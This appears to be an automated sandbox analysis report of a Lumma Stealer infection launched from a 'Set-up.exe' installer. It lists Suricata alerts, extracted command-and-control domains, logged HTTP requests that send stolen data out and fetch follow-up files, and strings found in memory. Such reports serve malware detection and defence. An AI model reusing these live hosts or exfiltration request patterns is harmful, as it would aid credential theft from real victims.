Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_00DAD921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.25.52:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: beattalkerz.cyou
Source: Malware configuration extractor	URLs: abruptyopsn.shop

Source: Joe Sandbox View

IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.25.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0UXRM0SIRE6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18119Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C1RMM1KW6B0TGWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8758Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F4TSIOJGIPTLWQGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20417Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NNB4MD4V4YHGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1212Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C01FSJFY8LOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1084Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: beattalkerz.cyou
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DBD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

12_2_00DBD889

Source: global traffic

HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: global traffic	DNS traffic detected: DNS query: oTTuWZUCpWztYYToeMvyHdVgao.oTTuWZUCpWztYYToeMvyHdVgao
Source: global traffic	DNS traffic detected: DNS query: beattalkerz.cyou
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipvumisui.shop
Source: global traffic	DNS traffic detected: DNS query: dfgh.online

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beattalkerz.cyou

Source: 'Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 'Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 'Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 'Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000011.00000002.2235769377.0000000007328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 'Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 'Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 'Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 'Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 'Set-up.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 'Set-up.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: 'Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: 'Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 'Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2231978017.0000000004B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Fires.com, 0000000C.00000000.1715369198.0000000000E15000.00000002.00000001.01000000.00000007.sdmp, Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Pioneer.8.dr, Fires.com.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: 'Set-up.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000011.00000002.2231978017.0000000004B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBtq
Source: Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/HOeS
Source: Fires.com, 0000000C.00000002.2222110347.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, Fires.com, 0000000C.00000002.2222110347.00000000017B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/api
Source: Fires.com, 0000000C.00000002.2222110347.00000000017FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/api(
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/api)
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/apibu
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/gf06r/rqanYKzRPHTmgGhjuyoc
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou/p
Source: Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou:443/api
Source: Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou:443/api84%76%90%49%72%74%74%86%84%84%86%75%72%91%80%86%85%90%49%72%74%74%86
Source: Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou:443/api9%107%112%118%113%107%113%105%118%53%111%122%105%118%124%123%53%118%
Source: Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beattalkerz.cyou:443/apin.txtPK
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtM)
Source: Fires.com, 0000000C.00000002.2223065322.0000000004784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txteK
Source: Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.2231978017.0000000004F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online
Source: powershell.exe, 00000011.00000002.2230662155.0000000002CC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2231978017.0000000004F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2235605610.00000000072E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
Source: powershell.exe, 00000011.00000002.2231598557.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compname=
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.2231978017.00000000053FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/Bp
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: Fires.com, 0000000C.00000002.2223295221.0000000004868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtQD
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtX
Source: Fires.com, 0000000C.00000002.2222110347.00000000017B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtp
Source: Fires.com, 0000000C.00000002.2222110347.00000000017B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt~
Source: Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
Source: powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Fires.com, 0000000C.00000003.2135626746.00000000048BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Fires.com, 0000000C.00000003.2147298829.00000000048B6000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135626746.00000000048BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Fires.com, 0000000C.00000003.2147298829.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Fires.com, 0000000C.00000003.2147298829.00000000048B6000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135626746.00000000048BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Fires.com, 0000000C.00000003.2147298829.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Fires.com.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
